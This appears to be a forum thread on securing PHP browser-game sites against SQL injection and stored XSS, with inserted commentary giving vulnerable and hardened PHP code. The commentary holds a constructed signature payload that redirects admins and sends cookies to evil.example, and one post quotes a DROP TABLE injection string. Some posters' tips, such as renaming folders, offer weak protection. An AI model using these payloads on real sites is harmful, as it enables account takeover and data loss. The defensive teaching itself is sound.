MakeWebGames

Which Pages to Secure your game---A must read---


Joshua


Ok, so granted I don't know EVERYTHING... but after 8 months now of working on my own site and dealing with attempted hacks, I've learned a few things.

I figured I'd make this post, as just saying "Secure ALL pages" doesn't appear to get through to people, and for SOME reason everyone thinks that a few header inserts will stop a hack.

Let me help you better understand why THIS is not going to stop anything.

1. abs@intval in the header for securing user IDs, ViewTopic and ViewForum stops just that.

They make sure the user is the right user. That's it, nothing more.

So while that may stop a quick URL injection hack, it doesn't stop SQL injections in your forums or any other form of hack, XSS, shell etc.

__________________

2. The $IP hack fix is about one of the only fixes I've seen on this board that helps stop a full-fledged hacker that has more than 2 hacks to copy and paste.

People were using an older version of Firefox and an X spoofer to IP hack games and make themselves admins.

The $IP secure stops this.

_________________________

Here are the following pages that I know of that are exploitable and should be secured. Use mysql_real_escape_string() to secure $_POST and $_GET in all these folders; that's a starter.

Forum TOPIC

Forum SUBJECT---Even with the secured forums, <meta tag> hacks will work on those 2. Secure them or, even better, ban automatically if someone tries it.

Signature---Again, <meta> hacks can use the signature to A. auto-admin when an admin views your profile, or B. redirect users to another site when they view your profile, or C. ... the possibilities are endless.

Display Pic---By inserting hacks, users can become admin upon being viewed, just as with the sig.

Username---Make sure they can't enter hacks; secure your names.

Forum Avatar/Sig---AGAIN, secure this.

Player Report---It's a form, it can be exploited.

Bug Report---Another exploitable form.

Player Ads---Exploitable forms.

Staff Apps---Forms.

Basically any page where you can insert form data is the most susceptible to malicious attacks.

Secure all your $_GET and $_POST variables when possible, to prevent SHELL type hacks. Also learn to use sprintf() to clean all data.

Never share your cPanel access with ANYONE you can't trust.

Change your password every so often. Keep it difficult; don't make it "cool" or "silver". Try adding characters and remember them, such as...

iam!!elite2

View your error logs! This will tell you where people are trying to access your site! It also tells you their IP for banning reasons :-) and helps you out with any little bugs you may encounter.

If you are able to do so,

change your staff_special folder over to a different name no one will find out or guess. Then stick it in a specially named folder... go into everything that calls for staff_special and rename it to your new name/location. That will stop the auto-admin problem 100%. Unless they manage to upload a shell ><

That's all for now, I'll edit if I remember any more stuff. If you have questions about just how to do any of the stuff I asked, they make this BEAUTIFUL little feature, it's up top of the boards in the right-hand corner, right next to a pretty green arrow... called SEARCH.

Thanks :)

----IF YOU HAVE any question as to whether your site is vulnerable to hacks, message me here or on MSN [email protected] and I'll attempt the few that I have discovered.

--Nothing malicious like a shell upload, as I'm not sure how that one works--

Then you will know where to start.

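The two points the post above makes (an intval() on the ID stops only a bad ID, and a stored "<meta> hack" in a signature fires when an admin views the profile) look like this side by side. This is an added example, not code from the post or from the game script it refers to. It assumes PHP 7+ with mysqli (mysqlnd), and the table and column names `users`, `userid`, `username` and `signature` are invented for the illustration; the sample signature is a constructed payload.

```php
<?php
// Added example, not code from the original post. Assumes PHP 7+ with the
// mysqli extension (mysqlnd) and a `users` table with `userid`, `username`
// and `signature` columns; those names are invented for the illustration.

// Constructed sample of a stored "<meta> hack" of the kind the post describes:
// if an admin's browser renders a profile containing this, it is silently
// sent to an admin-only URL with the admin's own cookies attached.
$sample_signature = '<meta http-equiv="refresh" content="0;url=staff_special/index.php?promote=5">'
                  . '<script>location="http://evil.example/?c=" + document.cookie</script>';

// --- What the "header fix" alone gives you --------------------------------
// abs(intval()) keeps $id safe to interpolate into the query, but the signature
// is echoed raw, so whatever a player stored in it runs in the viewer's browser.
function show_profile_vulnerable(mysqli $db, $raw_id)
{
    $id  = abs(intval($raw_id));
    $res = $db->query("SELECT username, signature FROM users WHERE userid = $id");
    $row = $res->fetch_assoc();
    return "<h1>{$row['username']}</h1><div>{$row['signature']}</div>";
}

// --- Hardened version -----------------------------------------------------
function show_profile_hardened(mysqli $db, $raw_id)
{
    $id = abs(intval($raw_id));
    if ($id < 1) {
        return 'Invalid user id';
    }
    // Prepared statement: the value is bound, never pasted into the SQL text.
    $stmt = $db->prepare('SELECT username, signature FROM users WHERE userid = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null) {
        return 'No such user';
    }
    // Encode on output: <meta>, <script>, quotes etc. become inert text.
    return '<h1>' . html($row['username']) . '</h1><div>' . html($row['signature']) . '</div>';
}

function html($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Runs without a database: shows what the encoding does to the sample payload.
echo html($sample_signature), "\n";
```

The meta refresh only works because the admin page acts on a plain GET that arrives with the admin's session cookie. Encoding the signature on output stops the payload from ever becoming markup, wherever it is displayed; renaming the staff_special folder, as the post suggests, only hides the target URL, and the next stored payload can point at the new name once it leaks.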

Just a little thing. I'm not going to say anything else, as at least you're helping :)

1. abs@intval in header for securing users ID, ViewTopic and ViewForum, stop just that.

They make sure the user is the Right user. That's it, nothing more.

^^

That makes sure that it's an actual number... :)


May I just add? Wouldn't the best way to stop people from becoming admins automatically be to change the

user_level

in the database to something else that no one would ever guess, and then go on every single page of the game and find the

if($ir['user_level'] == 1)

if($ir['user_level'] == 2)

if($ir['user_level'] == 3)

if($ir['user_level'] == 4)

and so on...

then change the user_level part into what you changed it to in the database?

Or can they still make themselves admin?


That's a "quick" fix as well, as it's only a matter of time before it's guessed, not to mention you'd have to change A LOT of files and update your SQL database tables.

It's much easier just to rename files and change them in the script, hide files, password-protect files etc.

If they want to find the user level, it wouldn't be too hard :P



Well, aren't you supposed to secure every page? The guide is great, just saying. I think you posted this a while back though, so I'm sure you know by now. As for meta tags working on secured forums, it doesn't work on the ones I made.


One really big thing that I see missing...

NEVER take raw input (PHP $_GET, $_POST or $_REQUEST) and put it directly into a query. This is just asking for trouble, as it opens up a hole for SQL injections.

Always sanitize any values that are going into the database queries, even if they are generated by a function. For example, if you have a dropdown box for selecting something, do NOT trust the value that you are getting just because it is not simple to change the values. There are plenty of tools out there that allow someone to intercept and modify data before it goes to the webserver.

So, how do you sanitize your input?

Check to make sure it is a value you expect. If you are looking for an integer, there should be no characters in it. is_int, is_double, is_string, and is_object are helpful for this.

If you are expecting a URL (say, for a picture) you should make sure that it is properly formatted. Regex checking comes in handy here.

If it is something that you want to accept HTML in (forums, mail, signatures, etc.) I would suggest using strip_tags to remove any unwanted tags. Alternatively, you could block all HTML and only allow BBCodes or your own variation of them. The newest version of PHP has BBCode functionality already built in; I believe it started with PHP 5.2.0, but I am not entirely sure.

While mysql_real_escape_string is a good start, you may want to use trim to remove extraneous whitespace from a string (newline, space, tab, carriage return, null byte, etc.).

A simple function for this would be:

function make_safe($var, $allowablehtml = '<a><img>')
{
    $var = trim($var);                                         // remove leading and trailing whitespace
    $var = strip_tags($var, $allowablehtml);                   // remove unwanted HTML, keeping only the allowed tags
    $var = str_replace(array("\r\n", "\r", "\n"), "", $var);   // remove any carriage returns or newlines
    $var = mysql_real_escape_string($var);                     // escape for the query last, so the replacements above still match
                                                               // (needs an open mysql_connect() link)
    return $var;
}

 

You can also add htmlentities to the function to convert any HTML special characters into their encoded equivalents; however, this will render any real HTML input invalid, because the resulting output when viewed in a browser will look like the actual HTML code. html_entity_decode will undo htmlentities if needed.

You could add a simple function that is called with every page load that automatically puts any input from the user through the make_safe function, but I would not advise doing so as there may be times when you want to be able to put in input that would be damaged by make_safe.

That aside, if you are making your own game from scratch, do not use an easy-to-guess table structure. If you keep the tables hard to guess, it is just that much more unlikely that a malicious user will be able to do anything. Also, it is a good idea to keep data that your users can edit separate from data that only the game itself should change. For example, username, profile, signature, etc. should all be in one table; stats and player data should be in another. This will prevent a player from being able to credit themselves stats with an SQL injection, which shouldn't be a problem if you follow the above, but having an extra layer of security never hurts.

Another thing you can do, if your webhost allows it, is to create different database users for different tasks. Have one user that only allows SELECT, one that only allows UPDATE, one that allows DELETE, and one that allows CREATE. This isn't a major issue, as PHP does not support multiple queries in a single mysql_query statement, so someone trying to do a '; DROP TABLE users; -- would not be able to do any harm. I'm not sure if ADODB has this same function; it looks like it does. Again, if you are checking anything and cleaning it up before putting it into a query, this wouldn't do much.

I hope my rambling makes sense.

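The checks the post above describes (an integer that must really be an integer, a picture URL that must be well formed, and a signature or forum post that should carry no raw HTML) as one runnable PHP file. This is an added example, not the poster's code; it goes a little beyond the post in that it does not rely on is_int (every $_GET and $_POST value arrives as a string, so is_int("5") is false) and in that it renders a small BBCode set itself instead of strip_tags. The helper names and the sample inputs are my own constructions; it assumes PHP 7+.

```php
<?php
// Added example, not from the original post. Input checks for the three kinds
// of field the post discusses, done on the strings PHP actually receives.

// 1. Integers. $_GET/$_POST values are always strings, so is_int('5') is false.
//    filter_var validates the contents and returns false for anything that is
//    not a whole number in range ('7 OR 1=1', '-3', '' all fail).
function clean_int($raw, $min = 1)
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min]]);
    return $v === false ? null : $v;
}

// 2. URLs for a display picture. Require http(s), a host, and an image
//    extension; this rejects javascript:/data: URLs and .php "images".
function clean_image_url($raw)
{
    $raw = trim((string) $raw);
    if (filter_var($raw, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts  = parse_url($raw);
    $scheme = strtolower($parts['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    if (!preg_match('/\.(png|jpe?g|gif)$/i', $parts['path'] ?? '')) {
        return null;
    }
    return $raw;
}

// 3. Signatures / forum posts. Accept no HTML at all: entity-encode everything
//    first, then turn a small BBCode set into HTML ourselves. Because the
//    encoding happens before the BBCode pass, a tag inside [url=...] or [b]
//    can no longer break out into markup.
function render_bbcode($raw)
{
    $s = htmlspecialchars(trim((string) $raw), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $s = preg_replace('/\[b\](.*?)\[\/b\]/s', '<b>$1</b>', $s);
    $s = preg_replace('/\[i\](.*?)\[\/i\]/s', '<i>$1</i>', $s);
    $s = preg_replace_callback(
        '/\[url=([^\]]+)\](.*?)\[\/url\]/s',
        function ($m) {
            // The href text was entity-encoded above; decode it, validate it,
            // and re-encode it into the attribute. Bad schemes lose the link.
            $url    = html_entity_decode($m[1], ENT_QUOTES | ENT_HTML5, 'UTF-8');
            $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
            if (filter_var($url, FILTER_VALIDATE_URL) === false
                || !in_array($scheme, ['http', 'https'], true)) {
                return $m[2];
            }
            return '<a href="' . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8')
                 . '" rel="nofollow">' . $m[2] . '</a>';
        },
        $s
    );
    return nl2br($s);
}

// Constructed inputs of the kinds the post warns about.
$ids  = ['7', '7 OR 1=1', '-3', ''];
$pics = ['https://img.example/me.png', 'javascript:alert(1)', 'http://x.example/shell.php'];
$sig  = "[b]hi[/b] <meta http-equiv=\"refresh\" content=\"0;url=http://evil.example\">\n"
      . "[url=javascript:alert(1)]click[/url] [url=https://example.org/]ok[/url]";

foreach ($ids as $v)  { var_dump(clean_int($v)); }
foreach ($pics as $v) { var_dump(clean_image_url($v)); }
echo render_bbcode($sig), "\n";
```

Only the URL that validates keeps its link; the `<meta>` tag comes out as literal `&lt;meta ...&gt;` text and cannot redirect anyone. The values these functions return are what should then be bound into a prepared statement; the post's make_safe escapes for the old mysql_* functions, which is fine as a last step but is no substitute for checking the type and shape of the value first.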
